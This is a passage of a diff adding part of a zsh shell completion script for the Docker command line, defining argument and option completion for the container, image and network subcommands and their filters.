+                _describe -t daemon-filter-opts "daemon filter options" daemon_opts && ret=0
+                ;;
+            (event)
+                local -a event_opts
+                event_opts=('attach' 'commit' 'connect' 'copy' 'create' 'delete' 'destroy' 'detach' 'die' 'disconnect' 'exec_create' 'exec_detach'
+                'exec_start' 'export' 'health_status' 'import' 'kill' 'load'  'mount' 'oom' 'pause' 'pull' 'push' 'reload' 'rename' 'resize' 'restart' 'save' 'start'
+                'stop' 'tag' 'top' 'unmount' 'unpause' 'untag' 'update')
+                _describe -t event-filter-opts "event filter options" event_opts && ret=0
+                ;;
+            (image)
+                __docker_complete_images && ret=0
+                ;;
+            (network)
+                __docker_complete_networks && ret=0
+                ;;
+            (type)
+                local -a type_opts
+                type_opts=('container' 'daemon' 'image' 'network' 'volume')
+                _describe -t type-filter-opts "type filter options" type_opts && ret=0
+                ;;
+            (volume)
+                __docker_complete_volumes && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_complete_prune_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    declare -a opts
+
+    opts=('until')
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        _describe -t filter-opts "filter options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+# BO container
+
+__docker_container_commands() {
+    local -a _docker_container_subcommands
+    _docker_container_subcommands=(
+        "attach:Attach to a running container"
+        "commit:Create a new image from a container's changes"
+        "cp:Copy files/folders between a container and the local filesystem"
+        "create:Create a new container"
+        "diff:Inspect changes on a container's filesystem"
+        "exec:Run a command in a running container"
+        "export:Export a container's filesystem as a tar archive"
+        "inspect:Display detailed information on one or more containers"
+        "kill:Kill one or more running containers"
+        "logs:Fetch the logs of a container"
+        "ls:List containers"
+        "pause:Pause all processes within one or more containers"
+        "port:List port mappings or a specific mapping for the container"
+        "prune:Remove all stopped containers"
+        "rename:Rename a container"
+        "restart:Restart one or more containers"
+        "rm:Remove one or more containers"
+        "run:Run a command in a new container"
+        "start:Start one or more stopped containers"
+        "stats:Display a live stream of container(s) resource usage statistics"
+        "stop:Stop one or more running containers"
+        "top:Display the running processes of a container"
+        "unpause:Unpause all processes within one or more containers"
+        "update:Update configuration of one or more containers"
+        "wait:Block until one or more containers stop, then print their exit codes"
+    )
+    _describe -t docker-container-commands "docker container command" _docker_container_subcommands
+}
+
+__docker_container_subcommand() {
+    local -a _command_args opts_help opts_attach_exec_run_start opts_create_run opts_create_run_update
+    local expl help="--help"
+    integer ret=1
+
+    opts_attach_exec_run_start=(
+        "($help)--detach-keys=[Escape key sequence used to detach a container]:sequence:__docker_complete_detach_keys"
+    )
+    opts_create_run=(
+        "($help -a --attach)"{-a=,--attach=}"[Attach to stdin, stdout or stderr]:device:(STDIN STDOUT STDERR)"
+        "($help)*--add-host=[Add a custom host-to-IP mapping]:host\:ip mapping: "
+        "($help)*--blkio-weight-device=[Block IO (relative device weight)]:device:Block IO weight: "
+        "($help)*--cap-add=[Add Linux capabilities]:capability: "
+        "($help)*--cap-drop=[Drop Linux capabilities]:capability: "
+        "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: "
+        "($help)--cidfile=[Write the container ID to the file]:CID file:_files"
+        "($help)--cpus=[Number of CPUs (default 0.000)]:cpus: "
+        "($help)*--device=[Add a host device to the container]:device:_files"
+        "($help)*--device-read-bps=[Limit the read rate (bytes per second) from a device]:device:IO rate: "
+        "($help)*--device-read-iops=[Limit the read rate (IO per second) from a device]:device:IO rate: "
+        "($help)*--device-write-bps=[Limit the write rate (bytes per second) to a device]:device:IO rate: "
+        "($help)*--device-write-iops=[Limit the write rate (IO per second) to a device]:device:IO rate: "
+        "($help)--disable-content-trust[Skip image verification]"
+        "($help)*--dns=[Custom DNS servers]:DNS server: "
+        "($help)*--dns-option=[Custom DNS options]:DNS option: "
+        "($help)*--dns-search=[Custom DNS search domains]:DNS domains: "
+        "($help)*"{-e=,--env=}"[Environment variables]:environment variable: "
+        "($help)--entrypoint=[Overwrite the default entrypoint of the image]:entry point: "
+        "($help)*--env-file=[Read environment variables from a file]:environment file:_files"
+        "($help)*--expose=[Expose a port from the container without publishing it]: "
+        "($help)*--group=[Set one or more supplementary user groups for the container]:group:_groups"
+        "($help -h --hostname)"{-h=,--hostname=}"[Container host name]:hostname:_hosts"
+        "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]"
+        "($help)--init[Run an init inside the container that forwards signals and reaps processes]"
+        "($help)--ip=[Container IPv4 address]:IPv4: "
+        "($help)--ip6=[Container IPv6 address]:IPv6: "
+        "($help)--ipc=[IPC namespace to use]:IPC namespace: "
+        "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)"
+        "($help)*--link=[Add link to another container]:link:->link"
+        "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: "
+        "($help)*"{-l=,--label=}"[Container metadata]:label: "
+        "($help)--log-driver=[Default driver for container logs]:logging driver:__docker_complete_log_drivers"
+        "($help)*--log-opt=[Log driver specific options]:log driver options:__docker_complete_log_options"
+        "($help)--mac-address=[Container MAC address]:MAC address: "
+        "($help)--name=[Container name]:name: "
+        "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)"
+        "($help)*--network-alias=[Add network-scoped alias for the container]:alias: "
+        "($help)--oom-kill-disable[Disable OOM Killer]"
+        "($help)--oom-score-adj[Tune the host's OOM preferences for containers (accepts -1000 to 1000)]"
+        "($help)--pids-limit[Tune container pids limit (set -1 for unlimited)]"
+        "($help -P --publish-all)"{-P,--publish-all}"[Publish all exposed ports]"
+        "($help)*"{-p=,--publish=}"[Expose a container's port to the host]:port:_ports"
+        "($help)--pid=[PID namespace to use]:PID namespace:__docker_complete_pid"
+        "($help)--privileged[Give extended privileges to this container]"
+        "($help)--read-only[Mount the container's root filesystem as read only]"
+        "($help)*--security-opt=[Security options]:security option: "
+        "($help)*--shm-size=[Size of '/dev/shm' (format is '<number><unit>')]:shm size: "
+        "($help)--stop-timeout=[Timeout (in seconds) to stop a container]:time: "
+        "($help)*--sysctl=-[sysctl options]:sysctl: "
+        "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]"
+        "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users"
+        "($help)*--ulimit=[ulimit options]:ulimit: "
+        "($help)--userns=[Container user namespace]:user namespace:(host)"
+        "($help)--tmpfs[mount tmpfs]"
+        "($help)*-v[Bind mount a volume]:volume: "
+        "($help)--volume-driver=[Optional volume driver for the container]:volume driver:(local)"
+        "($help)*--volumes-from=[Mount volumes from the specified container]:volume: "
+        "($help -w --workdir)"{-w=,--workdir=}"[Working directory inside the container]:directory:_directories"
+    )
+    opts_create_run_update=(
+        "($help)--blkio-weight=[Block IO (relative weight), between 10 and 1000]:Block IO weight:(10 100 500 1000)"
+        "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)"
+        "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: "
+        "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: "
+        "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: "
+        "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: "
+        "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: "
+        "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: "
+        "($help)--kernel-memory=[Kernel memory limit in bytes]:Memory limit: "
+        "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: "
+        "($help)--memory-reservation=[Memory soft limit]:Memory limit: "
+        "($help)--memory-swap=[Total memory limit with swap]:Memory limit: "
+        "($help)--restart=[Restart policy]:restart policy:(no on-failure always unless-stopped)"
+    )
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (attach)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_attach_exec_run_start \
+                "($help)--no-stdin[Do not attach stdin]" \
+                "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \
+                "($help -):containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (commit)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --author)"{-a=,--author=}"[Author]:author: " \
+                "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \
+                "($help -m --message)"{-m=,--message=}"[Commit message]:message: " \
+                "($help -p --pause)"{-p,--pause}"[Pause container during commit]" \
+                "($help -):container:__docker_complete_containers" \
+                "($help -): :__docker_complete_repositories_with_tags" && ret=0
+            ;;
+        (cp)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -L --follow-link)"{-L,--follow-link}"[Always follow symbol link]" \
+                "($help -)1:container:->container" \
+                "($help -)2:hostpath:_files" && ret=0
+            case $state in
+                (container)
+                    if compset -P "*:"; then
+                        _files && ret=0
+                    else
+                        __docker_complete_containers -qS ":" && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (create)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_create_run \
+                $opts_create_run_update \
+                "($help -): :__docker_complete_images" \
+                "($help -):command: _command_names -e" \
+                "($help -)*::arguments: _normal" && ret=0
+            case $state in
+                (link)
+                    if compset -P "*:"; then
+                        _wanted alias expl "Alias" compadd -E "" && ret=0
+                    else
+                        __docker_complete_running_containers -qS ":" && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (diff)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:containers:__docker_complete_containers" && ret=0
+            ;;
+        (exec)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_attach_exec_run_start \
+                "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \
+                "($help)*"{-e=,--env=}"[Set environment variables]:environment variable: " \
+                "($help -i --interactive)"{-i,--interactive}"[Keep stdin open even if not attached]" \
+                "($help)--privileged[Give extended Linux capabilities to the command]" \
+                "($help -t --tty)"{-t,--tty}"[Allocate a pseudo-tty]" \
+                "($help -u --user)"{-u=,--user=}"[Username or UID]:user:_users" \
+                "($help -):containers:__docker_complete_running_containers" \
+                "($help -)*::command:->anycommand" && ret=0
+            case $state in
+                (anycommand)
+                    shift 1 words
+                    (( CURRENT-- ))
+                    _normal && ret=0
+                    ;;
+            esac
+            ;;
+        (export)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -o --output)"{-o=,--output=}"[Write to a file, instead of stdout]:output file:_files" \
+                "($help -)*:containers:__docker_complete_containers" && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help -s --size)"{-s,--size}"[Display total file sizes]" \
+                "($help -)*:containers:__docker_complete_containers" && ret=0
+            ;;
+        (kill)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -s --signal)"{-s=,--signal=}"[Signal to send]:signal:_signals" \
+                "($help -)*:containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (logs)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--details[Show extra details provided to logs]" \
+                "($help -f --follow)"{-f,--follow}"[Follow log output]" \
+                "($help -s --since)"{-s=,--since=}"[Show logs since this timestamp]:timestamp: " \
+                "($help -t --timestamps)"{-t,--timestamps}"[Show timestamps]" \
+                "($help)--tail=[Output the last K lines]:lines:(1 10 20 50 all)" \
+                "($help -)*:containers:__docker_complete_containers" && ret=0
+            ;;
+        (ls|list)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Show all containers]" \
+                "($help)--before=[Show only container created before...]:containers:__docker_complete_containers" \
+                "($help)*"{-f=,--filter=}"[Filter values]:filter:__docker_complete_ps_filters" \
+                "($help)--format=[Pretty-print containers using a Go template]:template: " \
+                "($help -l --latest)"{-l,--latest}"[Show only the latest created container]" \
+                "($help -n --last)"{-n=,--last=}"[Show n last created containers (includes all states)]:n:(1 5 10 25 50)" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
+                "($help -s --size)"{-s,--size}"[Display total file sizes]" \
+                "($help)--since=[Show only containers created since...]:containers:__docker_complete_containers" && ret=0
+            ;;
+        (pause|unpause)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (port)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:containers:__docker_complete_running_containers" \
+                "($help -)2:port:_ports" && ret=0
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (rename)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -):old name:__docker_complete_containers" \
+                "($help -):new name: " && ret=0
+            ;;
+        (restart)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \
+                "($help -)*:containers:__docker_complete_containers_ids" && ret=0
+            ;;
+        (rm)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force removal]" \
+                "($help -l --link)"{-l,--link}"[Remove the specified link and not the underlying container]" \
+                "($help -v --volumes)"{-v,--volumes}"[Remove the volumes associated to the container]" \
+                "($help -)*:containers:->values" && ret=0
+            case $state in
+                (values)
+                    if [[ ${words[(r)-f]} == -f || ${words[(r)--force]} == --force ]]; then
+                        __docker_complete_containers && ret=0
+                    else
+                        __docker_complete_stopped_containers && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (run)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_create_run \
+                $opts_create_run_update \
+                $opts_attach_exec_run_start \
+                "($help -d --detach)"{-d,--detach}"[Detached mode: leave the container running in the background]" \
+                "($help)--health-cmd=[Command to run to check health]:command: " \
+                "($help)--health-interval=[Time between running the check]:time: " \
+                "($help)--health-retries=[Consecutive failures needed to report unhealthy]:retries:(1 2 3 4 5)" \
+                "($help)--health-timeout=[Maximum time to allow one check to run]:time: " \
+                "($help)--no-healthcheck[Disable any container-specified HEALTHCHECK]" \
+                "($help)--rm[Remove intermediate containers when it exits]" \
+                "($help)--runtime=[Name of the runtime to be used for that container]:runtime:__docker_complete_runtimes" \
+                "($help)--sig-proxy[Proxy all received signals to the process (non-TTY mode only)]" \
+                "($help)--stop-signal=[Signal to kill a container]:signal:_signals" \
+                "($help)--storage-opt=[Storage driver options for the container]:storage options:->storage-opt" \
+                "($help -): :__docker_complete_images" \
+                "($help -):command: _command_names -e" \
+                "($help -)*::arguments: _normal" && ret=0
+            case $state in
+                (link)
+                    if compset -P "*:"; then
+                        _wanted alias expl "Alias" compadd -E "" && ret=0
+                    else
+                        __docker_complete_running_containers -qS ":" && ret=0
+                    fi
+                    ;;
+                (storage-opt)
+                    if compset -P "*="; then
+                        _message "value" && ret=0
+                    else
+                        opts=('size')
+                        _describe -t filter-opts "storage options" opts -qS "=" && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (start)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                $opts_attach_exec_run_start \
+                "($help -a --attach)"{-a,--attach}"[Attach container's stdout/stderr and forward all signals]" \
+                "($help -i --interactive)"{-i,--interactive}"[Attach container's stding]" \
+                "($help -)*:containers:__docker_complete_stopped_containers" && ret=0
+            ;;
+        (stats)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Show all containers (default shows just running)]" \
+                "($help)--format=[Pretty-print images using a Go template]:template: " \
+                "($help)--no-stream[Disable streaming stats and only pull the first result]" \
+                "($help -)*:containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (stop)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -t --time)"{-t=,--time=}"[Number of seconds to try to stop for before killing the container]:seconds to before killing:(1 5 10 30 60)" \
+                "($help -)*:containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (top)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:containers:__docker_complete_running_containers" \
+                "($help -)*:: :->ps-arguments" && ret=0
+            case $state in
+                (ps-arguments)
+                    _ps && ret=0
+                    ;;
+            esac
+            ;;
+        (update)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                opts_create_run_update \
+                "($help -)*: :->values" && ret=0
+            case $state in
+                (values)
+                    if [[ ${words[(r)--kernel-memory*]} = (--kernel-memory*) ]]; then
+                        __docker_complete_stopped_containers && ret=0
+                    else
+                        __docker_complete_containers && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (wait)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)*:containers:__docker_complete_running_containers" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO container
+
+# BO image
+
+__docker_image_commands() {
+    local -a _docker_image_subcommands
+    _docker_image_subcommands=(
+        "build:Build an image from a Dockerfile"
+        "history:Show the history of an image"
+        "import:Import the contents from a tarball to create a filesystem image"
+        "inspect:Display detailed information on one or more images"
+        "load:Load an image from a tar archive or STDIN"
+        "ls:List images"
+        "prune:Remove unused images"
+        "pull:Pull an image or a repository from a registry"
+        "push:Push an image or a repository to a registry"
+        "rm:Remove one or more images"
+        "save:Save one or more images to a tar archive (streamed to STDOUT by default)"
+        "tag:Tag an image into a repository"
+    )
+    _describe -t docker-image-commands "docker image command" _docker_image_subcommands
+}
+
+__docker_image_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (build)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*--build-arg=[Build-time variables]:<varname>=<value>: " \
+                "($help)*--cache-from=[Images to consider as cache sources]: :__docker_complete_repositories_with_tags" \
+                "($help -c --cpu-shares)"{-c=,--cpu-shares=}"[CPU shares (relative weight)]:CPU shares:(0 10 100 200 500 800 1000)" \
+                "($help)--cgroup-parent=[Parent cgroup for the container]:cgroup: " \
+                "($help)--compress[Compress the build context using gzip]" \
+                "($help)--cpu-period=[Limit the CPU CFS (Completely Fair Scheduler) period]:CPU period: " \
+                "($help)--cpu-quota=[Limit the CPU CFS (Completely Fair Scheduler) quota]:CPU quota: " \
+                "($help)--cpu-rt-period=[Limit the CPU real-time period]:CPU real-time period in microseconds: " \
+                "($help)--cpu-rt-runtime=[Limit the CPU real-time runtime]:CPU real-time runtime in microseconds: " \
+                "($help)--cpuset-cpus=[CPUs in which to allow execution]:CPUs: " \
+                "($help)--cpuset-mems=[MEMs in which to allow execution]:MEMs: " \
+                "($help)--disable-content-trust[Skip image verification]" \
+                "($help -f --file)"{-f=,--file=}"[Name of the Dockerfile]:Dockerfile:_files" \
+                "($help)--force-rm[Always remove intermediate containers]" \
+                "($help)--isolation=[Container isolation technology]:isolation:(default hyperv process)" \
+                "($help)*--label=[Set metadata for an image]:label=value: " \
+                "($help -m --memory)"{-m=,--memory=}"[Memory limit]:Memory limit: " \
+                "($help)--memory-swap=[Total memory limit with swap]:Memory limit: " \
+                "($help)--network=[Connect a container to a network]:network mode:(bridge none container host)" \
+                "($help)--no-cache[Do not use cache when building the image]" \
+                "($help)--pull[Attempt to pull a newer version of the image]" \
+                "($help -q --quiet)"{-q,--quiet}"[Suppress verbose build output]" \
+                "($help)--rm[Remove intermediate containers after a successful build]" \
+                "($help)*--shm-size=[Size of '/dev/shm' (format is '<number><unit>')]:shm size: " \
+                "($help -t --tag)*"{-t=,--tag=}"[Repository, name and tag for the image]: :__docker_complete_repositories_with_tags" \
+                "($help)*--ulimit=[ulimit options]:ulimit: " \
+                "($help)--userns=[Container user namespace]:user namespace:(host)" \
+                "($help -):path or URL:_directories" && ret=0
+            ;;
+        (history)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -H --human)"{-H,--human}"[Print sizes and dates in human readable format]" \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
+                "($help -)*: :__docker_complete_images" && ret=0
+            ;;
+        (import)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*"{-c=,--change=}"[Apply Dockerfile instruction to the created image]:Dockerfile:_files" \
+                "($help -m --message)"{-m=,--message=}"[Commit message for imported image]:message: " \
+                "($help -):URL:(- http:// file://)" \
+                "($help -): :__docker_complete_repositories_with_tags" && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help -)*:images:__docker_complete_images" && ret=0
+            ;;
+        (load)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -i --input)"{-i=,--input=}"[Read from tar archive file]:archive file:_files -g \"*.((tar|TAR)(.gz|.GZ|.Z|.bz2|.lzma|.xz|)|(tbz|tgz|txz))(-.)\"" \
+                "($help -q --quiet)"{-q,--quiet}"[Suppress the load output]" && ret=0
+            ;;
+        (ls|list)
+            local state
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Show all images]" \
+                "($help)--digests[Show digests]" \
+                "($help)*"{-f=,--filter=}"[Filter values]:filter:->filter-options" \
+                "($help)--format=[Pretty-print images using a Go template]:template: " \
+                "($help)--no-trunc[Do not truncate output]" \
+                "($help -q --quiet)"{-q,--quiet}"[Only show numeric IDs]" \
+                "($help -): :__docker_complete_repositories" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_complete_images_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all)"{-a,--all}"[Remove all unused images, not just dangling ones]" \
+                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
+                "($help -f --force)"{-f,--force}"[Do not prompt for confirmation]" && ret=0
+            ;;
+        (pull)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -a --all-tags)"{-a,--all-tags}"[Download all tagged images]" \
+                "($help)--disable-content-trust[Skip image verification]" \
+                "($help -):name:__docker_search" && ret=0
+            ;;
+        (push)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--disable-content-trust[Skip image signing]" \
+                "($help -): :__docker_complete_images" && ret=0
+            ;;
+        (rm)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --force)"{-f,--force}"[Force removal]" \
+                "($help)--no-prune[Do not delete untagged parents]" \
+                "($help -)*: :__docker_complete_images" && ret=0
+            ;;
+        (save)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -o --output)"{-o=,--output=}"[Write to file]:file:_files" \
+                "($help -)*: :__docker_complete_images" && ret=0
+            ;;
+        (tag)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -):source:__docker_complete_images"\
+                "($help -):destination:__docker_complete_repositories_with_tags" && ret=0
+            ;;
+        (help)
+            _arguments $(__docker_arguments) ":subcommand:__docker_container_commands" && ret=0
+            ;;
+    esac
+
+    return ret
+}
+
+# EO image
+
+# BO network
+
+__docker_network_complete_ls_filters() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+
+    if compset -P '*='; then
+        case "${${words[-1]%=*}#*=}" in
+            (driver)
+                __docker_complete_info_plugins Network && ret=0
+                ;;
+            (id)
+                __docker_complete_networks_ids && ret=0
+                ;;
+            (name)
+                __docker_complete_networks_names && ret=0
+                ;;
+            (type)
+                type_opts=('builtin' 'custom')
+                _describe -t type-filter-opts "Type Filter Options" type_opts && ret=0
+                ;;
+            *)
+                _message 'value' && ret=0
+                ;;
+        esac
+    else
+        opts=('driver' 'id' 'label' 'name' 'type')
+        _describe -t filter-opts "Filter Options" opts -qS "=" && ret=0
+    fi
+
+    return ret
+}
+
+__docker_get_networks() {
+    [[ $PREFIX = -* ]] && return 1
+    integer ret=1
+    local line s
+    declare -a lines networks
+
+    type=$1; shift
+
+    lines=(${(f)${:-"$(_call_program commands docker $docker_options network ls)"$'\n'}})
+
+    # Parse header line to find columns
+    local i=1 j=1 k header=${lines[1]}
+    declare -A begin end
+    while (( j < ${#header} - 1 )); do
+        i=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 1 ))
+        j=$(( i + ${${header[$i,-1]}[(i)  ]} - 1 ))
+        k=$(( j + ${${header[$j,-1]}[(i)[^ ]]} - 2 ))
+        begin[${header[$i,$((j-1))]}]=$i
+        end[${header[$i,$((j-1))]}]=$k
+    done
+    end[${header[$i,$((j-1))]}]=-1
+    lines=(${lines[2,-1]})
+
+    # Network ID
+    if [[ $type = (ids|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[NETWORK ID]},${end[NETWORK ID]}]%% ##}"
+            s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
+            s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}"
+            networks=($networks $s)
+        done
+    fi
+
+    # Names
+    if [[ $type = (names|all) ]]; then
+        for line in $lines; do
+            s="${line[${begin[NAME]},${end[NAME]}]%% ##}"
+            s="$s:${(l:7:: :::)${${line[${begin[DRIVER]},${end[DRIVER]}]}%% ##}}"
+            s="$s, ${${line[${begin[SCOPE]},${end[SCOPE]}]}%% ##}"
+            networks=($networks $s)
+        done
+    fi
+
+    _describe -t networks-list "networks" networks "$@" && ret=0
+    return ret
+}
+
+__docker_complete_networks() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_networks all "$@"
+}
+
+__docker_complete_networks_ids() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_networks ids "$@"
+}
+
+__docker_complete_networks_names() {
+    [[ $PREFIX = -* ]] && return 1
+    __docker_get_networks names "$@"
+}
+
+__docker_network_commands() {
+    local -a _docker_network_subcommands
+    _docker_network_subcommands=(
+        "connect:Connect a container to a network"
+        "create:Creates a new network with a name specified by the user"
+        "disconnect:Disconnects a container from a network"
+        "inspect:Displays detailed information on a network"
+        "ls:Lists all the networks created by the user"
+        "prune:Remove all unused networks"
+        "rm:Deletes one or more networks"
+    )
+    _describe -t docker-network-commands "docker network command" _docker_network_subcommands
+}
+
+__docker_network_subcommand() {
+    local -a _command_args opts_help
+    local expl help="--help"
+    integer ret=1
+
+    opts_help=("(: -)--help[Print usage]")
+
+    case "$words[1]" in
+        (connect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*--alias=[Add network-scoped alias for the container]:alias: " \
+                "($help)--ip=[Container IPv4 address]:IPv4: " \
+                "($help)--ip6=[Container IPv6 address]:IPv6: " \
+                "($help)*--link=[Add a link to another container]:link:->link" \
+                "($help)*--link-local-ip=[Add a link-local address for the container]:IPv4/IPv6: " \
+                "($help -)1:network:__docker_complete_networks" \
+                "($help -)2:containers:__docker_complete_containers" && ret=0
+
+            case $state in
+                (link)
+                    if compset -P "*:"; then
+                        _wanted alias expl "Alias" compadd -E "" && ret=0
+                    else
+                        __docker_complete_running_containers -qS ":" && ret=0
+                    fi
+                    ;;
+            esac
+            ;;
+        (create)
+            _arguments $(__docker_arguments) -A '-*' \
+                $opts_help \
+                "($help)--attachable[Enable manual container attachment]" \
+                "($help)*--aux-address[Auxiliary IPv4 or IPv6 addresses used by network driver]:key=IP: " \
+                "($help -d --driver)"{-d=,--driver=}"[Driver to manage the Network]:driver:(null host bridge overlay)" \
+                "($help)*--gateway=[IPv4 or IPv6 Gateway for the master subnet]:IP: " \
+                "($help)--internal[Restricts external access to the network]" \
+                "($help)*--ip-range=[Allocate container ip from a sub-range]:IP/mask: " \
+                "($help)--ipam-driver=[IP Address Management Driver]:driver:(default)" \
+                "($help)*--ipam-opt=[Custom IPAM plugin options]:opt=value: " \
+                "($help)--ipv6[Enable IPv6 networking]" \
+                "($help)*--label=[Set metadata on a network]:label=value: " \
+                "($help)*"{-o=,--opt=}"[Driver specific options]:opt=value: " \
+                "($help)*--subnet=[Subnet in CIDR format that represents a network segment]:IP/mask: " \
+                "($help -)1:Network Name: " && ret=0
+            ;;
+        (disconnect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -)1:network:__docker_complete_networks" \
+                "($help -)2:containers:__docker_complete_containers" && ret=0
+            ;;
+        (inspect)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help -f --format)"{-f=,--format=}"[Format the output using the given go template]:template: " \
+                "($help -)*:network:__docker_complete_networks" && ret=0
+            ;;
+        (ls)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)--no-trunc[Do not truncate the output]" \
+                "($help)*"{-f=,--filter=}"[Provide filter values]:filter:->filter-options" \
+                "($help)--format=[Pretty-print networks using a Go template]:template: " \
+                "($help -q --quiet)"{-q,--quiet}"[Only display numeric IDs]" && ret=0
+            case $state in
+                (filter-options)
+                    __docker_network_complete_ls_filters && ret=0
+                    ;;
+            esac
+            ;;
+        (prune)
+            _arguments $(__docker_arguments) \
+                $opts_help \
+                "($help)*--filter=[Filter values]:filter:__docker_complete_prune_filters" \
